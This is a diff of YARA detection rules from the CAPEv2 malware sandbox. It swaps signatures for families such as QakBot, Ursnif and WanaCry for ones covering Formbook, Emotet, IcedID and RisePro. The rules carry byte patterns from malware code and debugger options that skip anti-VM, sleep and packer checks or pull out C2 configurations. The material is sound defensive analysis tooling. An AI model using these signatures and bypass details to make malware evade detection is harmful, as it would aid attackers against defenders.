+		cape_options = "clear,bp2=$config,action2=scan,count=0"
+		packed = "0270016f451f9ba630f2ea4e2ea006fb89356627835b560bb2f4551a735ba0e1"
 
 	strings:
-		$code = {FC 31 C9 49 89 CA 31 C0 31 DB AC 30 C8 88 E9 88 D5 88 F2 B6 08 66 D1 EB 66 D1 D8 73 09}
+		$config = {40 55 53 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 [4] 48 81 EC [2] 00 00 45 33 ?? 33 C0 4C 8B E9 4C 89}
+		$decode = {66 66 66 66 0F 1F 84 00 00 00 00 00 0F B6 41 01 48 FF C9 28 41 01 49 FF C9}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of them
 }
-rule CAPE_Amatera : FILE
+rule CAPE_Formconfb
 {
 	meta:
-		description = "Amatera syscall capture"
+		description = "Formbook Config Extraction"
 		author = "kevoreilly"
-		id = "0d58a054-8636-58d8-99b9-26560aa6c187"
-		date = "2025-06-25"
-		modified = "2025-06-25"
+		id = "46d78206-578b-5e12-b466-cd81610a5008"
+		date = "2021-03-07"
+		modified = "2025-12-08"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Amatera.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "35eb93548a0c037d392f870c05e0e9fb1aeff3a5a505e1d4a087f7465ed1f6af"
-		logic_hash = "1c02f04846568b85acbd4101b2e944dc824179f7cff1bceaec1c657939b610d5"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/Formbook.yar#L60-L75"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "d21596f25daea284790984b4ea0ba9c2764b94832791f43f9bb582085eaf6492"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_options = "sysbp=$sysenter"
+		tags = ""
+		cape_options = "clear,bp0=$c2_1,bp0=$c2_2,action0=string:rcx,bp1=$decoy,action1=string:rdi,bp2=$config,action2=scan,bp3=$sleep+5,action3=skip,count=0,typestring=Formbook Config"
+		packed = "60571b2683e7b753a77029ebe9b5e1cb9f3fbfa8d6a43e4b7239eefd13141ae4"
 
 	strings:
-		$sysenter = {64 FF 15 C0 00 00 00 C3}
-		$harness = {0F B7 55 EC 52 E8 [4] 83 C4 04 C7 45 F0 [4] 8B 45 ?? 50 [0-40] FF 55 F0 83 C4 ?? 8B E5 5D C3}
-		$socket = {66 89 [2] 6A 00 6A ?? 8D [3] 68 (03|07) 20 01 00 8B 4D F8 E8 [4] 0F B6 (C0|C8) 85 (C0|C9) 75 04 32 C0 EB}
+		$c2_1 = {44 0F B6 5D ?? 45 84 DB 74 ?? 48 8D 4D [1-5] 41 80 FB 2F 74 11 0F B6 41 01 48 FF C1 FF C3 44 0F B6 D8 84 C0 75}
+		$c2_2 = {40 53 48 83 EC 20 48 8B DA 48 85 C9 74 28 80 39 00 74 23 48 85 D2 74 1E 48 8B D1 41 B8 04 00 00 00 48 8B CB E8}
+		$decoy = {44 8D 1C 33 [0-13] 48 8D 7D [1-5] 42 C6 44 [2] 00 [0-4] 48 8B CF E8}
+		$config = {40 55 53 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 [4] 48 81 EC [2] 00 00 45 33 F6 33 C0 4C 8B E9 4C 89 75}
+		$sleep = {B9 88 13 00 00 FF D7 44 8B 9B [4] 41 81 FB 00 01 00 00 75 ?? 48 39 B3 [4] 74 ?? 8B 83 [4] 05 00 20 00 00 39 B0}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		2 of them
 }
-rule CAPE_Cargobayloader : FILE
+rule CAPE_Emotetpacker : FILE
 {
 	meta:
-		description = "CargoBayLoader anti-vm bypass"
+		description = "Emotet bypass"
 		author = "kevoreilly"
-		id = "5b347863-0bea-55d2-aaf3-b3d6e604be89"
-		date = "2023-02-20"
-		modified = "2023-02-20"
+		id = "67b8e14c-5fa8-52af-bb9a-1663b084fbf0"
+		date = "2022-03-31"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/CargoBayLoader.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "75e975031371741498c5ba310882258c23b39310bd258239277708382bdbee9c"
-		logic_hash = "1d5c4ca79f97e1fac358189a8c6530be12506974fc2fb42f63b0b621536a45c9"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/EmotetPacker.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "5a95d1d87ce69881b58a0e3aafc1929861e2633cdd960021d7b23e2a36409e0d"
+		logic_hash = "5f27d9d18884f7e0805f69960869b332c1577bf8be8ac103285e8bf98cda0ffd"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$jmp1+4,action0=skip,bp1=$jmp2+2,action1=skip,count=1,force-sleepskip=1"
+		cape_options = "bp0=$trap1+31,action0=skip,bp1=$trap2+43,action1=jmp:186,count=1"
 
 	strings:
-		$jmp1 = {40 42 0F 00 0F 82 [2] 00 00 48 8D 15 [4] BF 04 00 00 00 41 B8 04 00 00 00 4C 8D [3] 4C 89 F1 E8}
-		$jmp2 = {84 DB 0F 85 [2] 00 00 48 8D 15 [4] 41 BE 03 00 00 00 41 B8 03 00 00 00 4C 8D 7C [2] 4C 89 F9 E8}
+		$trap1 = {8B 45 08 0F 28 0D [4] 0F 57 C0 0F 29 46 30 89 46 40 C7 46 44 00 00 00 00 0F 11 4E 48 E8}
+		$trap2 = {F2 0F 10 15 [4] BE 01 00 00 00 0F 01 F9 C7 44 24 60 00 00 00 00 89 4C 24 60 0F 01 F9 C7 44 24 5C 00 00 00 00 89 4C 24 5C 0F 1F 84 00 00 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and any of ( $trap* )
 }
-rule CAPE_Socks5Systemz : FILE
+rule CAPE_Icedidsyscallwritemem : FILE
 {
 	meta:
-		description = "Socks5Systemz config extraction"
+		description = "IcedID 'syscall' packer bypass - direct write variant"
 		author = "kevoreilly"
-		id = "ef14953a-2b48-54f4-8d15-c07c7459103e"
-		date = "2024-05-22"
-		modified = "2025-05-23"
+		id = "67935058-4191-587f-ad19-497defd0eef1"
+		date = "2021-03-30"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Socks5Systemz.yar#L1-L19"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "7e324bacd1ea57585435b6a5a4c93bda63ca146c100f2361a1c5530b87668299"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/IcedID.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "6b068106b038e9efeb9057cadf314d400c1ada1a1cc70336d3272da3a212c993"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "br0=user32::wsprintfA,br1=ntdll::sprintf,action2=string:[esp],action3=string:[esp],count=0,typestring=Socks5Systemz Config"
-		packed = "9b997d0de3fe83091726919a0dc653e22f8f8b20b1bb7d0b8485652e88396f29"
+		cape_options = "bp0=$tokencheck+9,action0=jmp,count=0"
+		packed = "28075ecae5e224c06e250f2c949c826b81844bca421e9158a7a9e965a29ef894"
+		packed = "045dff9f14a03225df55997cb2ca74ff60ecaf317b9e033ea93386785db84161"
 
 	strings:
-		$chunk1 = {0F B6 84 8A [4] E9 [3] (00|FF)}
-		$chunk2 = {0F B6 04 8D [4] E9 [3] (00|FF)}
-		$chunk3 = {66 0F 6F 05 [4] E9 [3] (00|FF)}
-		$chunk4 = {F0 0F B1 95 [4] E9 [3] (00|FF)}
-		$chunk5 = {83 FA 04 E9 [3] (00|FF)}
-		$chunk6 = {8A 04 8D [4] E9 [3] (00|FF)}
-		$chunk7 = {83 C4 04 83 C4 04 E9}
-		$chunk8 = {83 C2 04 87 14 24 5C E9}
+		$tokencheck = {39 5D ?? 75 06 83 7D ?? 03 74 05 BB 01 00 00 00 41 89 1C ?? 48 8B 4D ?? 41 FF D?}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Ursnifv3
+rule CAPE_Icedidhook
 {
 	meta:
-		description = "Ursnif Config Extraction"
+		description = "IcedID hook fix"
 		author = "kevoreilly"
-		id = "4170b638-e51b-59c6-956a-50ff82f629ba"
-		date = "2021-06-17"
-		modified = "2023-03-23"
+		id = "011c9cb7-8080-5f8a-9dca-6397e9bf7bf6"
+		date = "2021-03-30"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/UrsnifV3.yar#L1-L16"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "d679546e37ee58087fce75920b2ce4e6d2b9ae55fb1ef80d14ec14309396757c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/IcedID.yar#L15-L25"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "fd62e0ed6f2a18472fa9336daee0e8a3a55e21779a8385394e85f96da928e24f"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_options = "br0=$crypto32_1-48,action1=dump:ebx::eax,bp2=$crypto32_3+50,action2=dump:ebx::eax,bp3=$crypto32_4+11,action3=dump:eax::ecx,typestring=UrsnifV3 Config,count=1"
-		packed = "75827be0c600f93d0d23d4b8239f56eb8c7dc4ab6064ad0b79e6695157816988"
-		packed = "5d6f1484f6571282790d64821429eeeadee71ba6b6d566088f58370634d2c579"
+		cape_options = "ntdll-protect=0"
 
 	strings:
-		$crypto32_1 = {8B C3 83 EB 01 85 C0 75 0D 0F B6 16 83 C6 01 89 74 24 14 8D 58 07 8B C2 C1 E8 07 83 E0 01 03 D2 85 C0 0F 84 AB 01 00 00 8B C3 83 EB 01 85 C0 89 5C 24 20 75 13 0F B6 16 83 C6 01 BB 07 00 00 00}
-		$crypto32_3 = {F6 46 03 02 75 5? 8B 46 10 40 50 E8 [4] 8B D8 89 5C 24 1C 85 DB 74 41 F6 46 03 01 74 53 8B 46 10 89 44 24 1C 8B 46 0C 53 03 C7 E8 [4] 59}
-		$crypto32_4 = {C7 44 24 10 01 00 00 00 8B 4E 10 C6 04 08 00 8B 4D ?? 89 01 8B 46 ?? 8B 4D ?? 89 01 8B 44 24 10 5F 5E 5B 8B E5 5D C2 0C 00}
-		$cpuid = {8B C4 FF 18 8B F0 33 C0 0F A2 66 8C D8 66 8E D0 8B E5 8B C6 5E 5B 5D C3}
+		$hook = {C6 06 E9 83 E8 05 89 46 01 8D 45 ?? 50 FF 75 ?? 6A 05 56 6A FF E8 2D FA FF FF}
 
 	condition:
-		any of ( $crypto32* ) and $cpuid
+		any of them
 }
-rule CAPE_Qakbot5 : FILE
+rule CAPE_Icedidpackera : FILE
 {
 	meta:
-		description = "QakBot WMI anti-anti-vm"
+		description = "IcedID export selection"
 		author = "kevoreilly"
-		id = "d287b043-15df-5865-ad4c-9eb64ceec04c"
-		date = "2022-03-16"
-		modified = "2024-02-16"
+		id = "d793d8a1-0e17-56ad-933c-470e2290867b"
+		date = "2021-03-30"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/QakBot.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "303ea2d8d1a7f0fd0ca5508dae2c1b83c03b1e3e975760f15d36d93bcc152767"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/IcedID.yar#L27-L40"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe"
+		logic_hash = "aa0681e7794546355e6d61f739c49035a493cdfca7e666531d74e3835ec44408"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$loop+35,action0=skip,count=0"
-		packed = "f4bb0089dcf3629b1570fda839ef2f06c29cbf846c5134755d22d419015c8bd2"
+		cape_options = "export=$export"
 
 	strings:
-		$loop = {8B 75 ?? 48 8B 4C [2] FF 15 [4] 48 8B 4C [2] 48 8B 01 FF 50 ?? 8B DE 48 8B 4C [2] 48 85 C9 0F 85 [4] EB 4E}
-		$conf = {0F B7 1D [4] B9 [2] 00 00 E8 [4] 8B D3 48 89 45 ?? 45 33 C9 48 8D 0D [4] 4C 8B C0 48 8B F8 E8}
+		$init = "init"
+		$export = {48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 81 EC [2] 00 00 41 8B E9 49 8B F0 48 8B FA 48 8B D9}
+		$alloc = {8B 50 50 33 C9 44 8D 49 40 41 B8 00 30 00 00 FF 15 [4] 48 89 44 24 28 [0-3] 48 89 84 24 ?? 00 00 00 E9}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Qakbot4 : FILE
+rule CAPE_Icedidpackerb : FILE
 {
 	meta:
-		description = "QakBot Config Extraction"
+		description = "IcedID export selection"
 		author = "kevoreilly"
-		id = "401184cf-bbd7-5afe-9589-470f54721af1"
-		date = "2022-03-16"
-		modified = "2024-02-16"
+		id = "6bd0e64d-e60e-5cd2-af79-946a7f6dc9f5"
+		date = "2021-03-30"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/QakBot.yar#L15-L29"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "ad75b07b9b786f634fd46cbe6dc089d3f732673320e70714e8ab058f0392c9f5"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/IcedID.yar#L42-L56"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "6517ef2c579002ec62ddeb01a3175917c75d79ceca355c415a4462922c715cb6"
+		logic_hash = "fde1e2c0124d180b2fa3d0675b35e8d78fdd7b06cd27e9228c148aa29ce30ee7"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config"
-		packed = "f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68"
+		cape_options = "export=$export"
 
 	strings:
-		$params = {8B 7D ?? 8B F1 57 89 55 ?? E8 [4] 8D 9E [2] 00 00 89 03 59 85 C0 75 08 6A FC 58 E9}
-		$c2list1 = {59 59 8D 4D D8 89 45 E0 E8 [4] 8B 45 E0 85 C0 74 ?? 8B 90 [2] 00 00 51 8B 88 [2] 00 00 6A 00 E8}
-		$c2list2 = {59 59 8B F8 8D 4D ?? 89 7D ?? E8 [4] 85 FF 74 52 8B 97 [2] 00 00 51 8B 8F [2] 00 00 53 E8}
-		$conf = {5F 5E 5B C9 C3 51 6A 00 E8 [4] 59 59 85 C0 75 01 C3}
+		$init = "init"
+		$export = {44 89 4C 24 20 4C 89 44 24 18 48 89 4C 24 08 41 55 41 56 41 57 48 81 EC ?? 00 00 00 B9 [2] 00 00 4C 8B EA E8}
+		$loop = {8B C2 48 8D 49 01 83 E0 07 FF C2 0F B6 44 30 ?? 30 41 FF 3B D5 72}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Qakbotloader : FILE
+rule CAPE_Icedidpackerc : FILE
 {
 	meta:
-		description = "QakBot Export Selection"
+		description = "IcedID export selection"
 		author = "kevoreilly"
-		id = "b2d5ef1c-0651-5249-9c4b-7e83235d4a30"
-		date = "2022-03-16"
-		modified = "2024-02-16"
+		id = "fddfd0d2-1bc0-56bb-b983-5850e17a3d0f"
+		date = "2021-03-30"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/QakBot.yar#L31-L46"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "6f99171c95a8ed5d056eeb9234dbbee123a6f95f481ad0e0a966abd2844f0e1a"
-		logic_hash = "00869c0a9bf62cde3f46ca915b0ef689557b09dc58d6de34609e3998abfa7e98"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/IcedID.yar#L58-L71"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "c06805b6efd482c1a671ec60c1469e47772c8937ec0496f74e987276fa9020a5"
+		hash = "265c1857ac7c20432f36e3967511f1be0b84b1c52e4867889e367c0b5828a844"
+		logic_hash = "f1e75e380ab0947fdfda012b7a5077a1c2ef51163239846ab2dc29cac95ba166"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_options = "export=$export1,export=$export2,export=$export3"
+		cape_options = "export=$export"
 
 	strings:
-		$export1 = {55 8B EC 83 EC 50 (3A|66 3B) ?? 74}
-		$export2 = {55 8B EC 3A ?? 74 [8-16] 74 [6-16] EB}
-		$export3 = {55 8B EC 66 3B ?? 74 [3-5] 74}
-		$wind = {(66 3B|3A) ?? 74 [1-14] BB 69 04 00 00 53 E? [5-20] 74}
-		$getteb = {EB 00 55 8B EC 66 3B E4 74 ?? [1-5] 64 A1 18 00 00 00 5D EB}
+		$export = {44 89 4C 24 20 4C 89 44 24 18 48 89 54 24 10 3A ED 74}
+		$alloc = {41 B8 00 10 00 00 8B D0 33 C9 66 3B ?? (74|0F 84)}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $export* ) ) and ( $wind or $getteb )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Qakbotantivm
+rule CAPE_Icedidpackerd : FILE
 {
 	meta:
-		description = "QakBot AntiVM bypass"
+		description = "IcedID export selection"
 		author = "kevoreilly"
-		id = "7446522a-788a-512d-ad68-2fcc56169f5a"
-		date = "2022-03-16"
-		modified = "2024-02-16"
+		id = "df0ca4bd-1ea6-57ef-b85a-7ed0e2a20831"
+		date = "2021-03-30"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/QakBot.yar#L48-L59"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "e269497ce458b21c8427b3f6f6594a25d583490930af2d3395cb013b20d08ff7"
-		logic_hash = "20f1cd28f38945a3aa328e77e78525fb1ffc47ecf54d5a40c2f18264c3973989"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/IcedID.yar#L73-L86"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "7b226f8cc05fa7d846c52eb0ec386ab37f9bae04372372509daa6bacc9f885d8"
+		logic_hash = "6685e0246f5a11ce0ca33447837de06506b447a5f8591423e2b76f2ab0274dc7"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_options = "bp0=$antivm1,action0=unwind,count=1"
+		tags = "FILE"
+		cape_options = "export=$export"
 
 	strings:
-		$antivm1 = {55 8B EC 3A E4 0F [2] 00 00 00 6A 04 58 3A E4 0F [2] 00 00 00 C7 44 01 [5] 81 44 01 [5] 66 3B FF 74 ?? 6A 04 58 66 3B ED 0F [2] 00 00 00 C7 44 01 [5] 81 6C 01 [5] EB}
+		$init = "init"
+		$export = {44 89 4C 24 20 4C 89 44 24 18 48 89 54 24 10 66 3B ED 74}
+		$load = {41 B8 00 80 00 00 33 D2 48 8B 4C [2] EB ?? B9 69 04 00 00 E8 [4] 48 89 84 [2] 00 00 00 66 3B ED 74}
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Formbook
+rule CAPE_Icedsleep : FILE
 {
 	meta:
-		description = "Formbook Payload"
+		description = "IcedID sleep bypass"
 		author = "kevoreilly"
-		id = "3389c0a7-eb86-5465-8a14-63f812d257db"
-		date = "2019-10-30"
-		modified = "2023-10-13"
+		id = "d6bd708b-47bc-5620-b40e-8fe5f1a67ba4"
+		date = "2021-03-30"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Formbook.yar#L1-L18"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "63ee4dd6fe5ed2a3e5ee88ba7de48d2c9e0024961a550d0fdb68891c9885e05e"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/IcedID.yar#L88-L99"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "0b1a8be95b1b8a3b066837f9e47561ee8202d741b39d64e626c0461c2fbf7c70"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "Formbook Payload"
-		packed = "9e38c0c3c516583da526016c4c6a671c53333d3d156562717db79eac63587522"
-		packed = "2379a4e1ccdd7849ad7ea9e11ee55b2052e58dda4628cd4e28c3378de503de23"
+		tags = "FILE"
+		cape_options = "force-sleepskip=1"
+		packed = "e99f3517a36a9f7a55335699cfb4d84d08b042d47146119156f7f3bab580b4d7"
 
 	strings:
-		$remap_ntdll = {33 56 0? 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B}
-		$rc4dec = {F7 E9 C1 FA 03 8B C2 C1 E8 1F 03 C2 8D 04 80 03 C0 03 C0 8B D1 2B D0 8A 04 3A 88 8C 0D [4] 88 84 0D [4] 41 81 F9 00 01 00 00 7C}
-		$decrypt = {8A 50 01 28 10 48 49 75 F7 83 FE 01 76 14 8B C7 8D 4E FF 8D 9B 00 00 00 00 8A 50 01 28 10 40 49 75 F7}
-		$string = {33 C0 66 39 01 74 0B 8D 49 00 40 66 83 3C 41 00 75 F8 8B 55 0C 8D 44 00 02 50 52 51 E8}
-		$mutant = {64 A1 18 00 00 00 8B 40 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 8B E5 5D C3}
-		$postmsg = {8B 7D 0C 6A 00 6A 00 68 11 01 00 00 57 FF D6 85 C0 75 ?? 50}
+		$sleep = {89 4C 24 08 48 83 EC 38 8B 44 24 40 48 69 C0 10 27 00 00 48 F7 D8 48 89 44 24 20 48 8D 54 24 20 33 C9 FF 15 [4] 48 83 C4 38 C3}
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Wanacry : FILE
+rule CAPE_Anticuckoo : FILE
 {
 	meta:
-		description = "WanaCry Payload"
+		description = "AntiCuckoo bypass: https://github.com/therealdreg/anticuckoo"
 		author = "kevoreilly"
-		id = "a6525e0f-fccd-5542-9be8-e42d708fe502"
-		date = "2019-10-30"
-		modified = "2022-06-09"
+		id = "e221e57b-313e-5998-a3fc-5b4e9671b989"
+		date = "2023-03-17"
+		modified = "2023-03-17"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/WanaCry.yar#L1-L16"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "16d5e39f043d27bbf22f8f21e13971b7e0709b07e44746dd157d11ee4cc51944"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/AntiCuckoo.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "ad5e52f144bb4a1dae3090978c6ecb4c7732538c9b62a6cedd32eccee6094be5"
+		logic_hash = "a039aeca2dae44980e8bffafacfda90975e107001be50f11ac916b35ad43592e"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "WanaCry Payload"
+		cape_options = "bp0=$HKActivOldStackCrash+36,action0=jmp,count=1"
 
 	strings:
-		$exename = "@WanaDecryptor@.exe"
-		$res = "%08X.res"
-		$pky = "%08X.pky"
-		$eky = "%08X.eky"
-		$taskstart = {8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53}
+		$HKActivOldStackCrash = {5B 81 FB FA FA FA FA 74 01 41 3B E0 75 ?? 83 E9 0B 83 F9 04 7F 04 C6 45 ?? 00 89 4D ?? 89 65 ?? 80 7D ?? 00 74}
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Zeuspanda : FILE
+rule CAPE_Risepro : FILE
 {
 	meta:
-		description = "ZeusPanda Payload"
+		description = "No description has been set in the source file - CAPE"
 		author = "kevoreilly"
-		id = "7891c021-6687-5457-b9e1-0beb0472647c"
-		date = "2019-10-30"
-		modified = "2022-06-09"
+		id = "63d9cb19-0688-5632-8477-ce9b7e986a55"
+		date = "2023-12-16"
+		modified = "2023-12-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/ZeusPanda.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "43d8a56cae9fd23c053f6956851734d3270b46a906236854502c136e3bb1e761"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/analyzer/windows/data/yara/RisePro.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "1b69a1dd5961241b926605f0a015fa17149c3b2759fb077a30a22d4ddcc273f6"
+		logic_hash = "055ca8328923b91f93c116e4a856366356fa11155f4e9fde95da31129b51386a"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "ZeusPanda Payload"
+		cape_options = "bp0=$c2+15,action0=string:edx,bp1=$c2+41,action1=string:ecx,count=1"
 
 	strings:
-		$code1 = {8B 01 57 55 55 55 55 55 55 53 51 FF 50 0C 85 C0 78 E? 55 55 6A 03 6A 03 55 55 6A 0A FF 37}
-		$code2 = {8D 85 B0 FD FF FF 50 68 ?? ?? ?? ?? 8D 85 90 FA FF FF 68 0E 01 00 00 50 E8 ?? ?? ?? ?? 83 C4 10 83 F8 FF 7E ?? 68 04 01 00 00 8D 85 B0 FD FF FF}
+		$decode1 = {8A 06 46 84 C0 75 F9 2B F1 B8 FF FF FF 7F 8B 4D ?? 8B 51 ?? 2B C2 3B C6 72 38 83 79 ?? 10 72 02 8B 09 52 51 56 53 51 FF 75 ?? 8B CF E8}
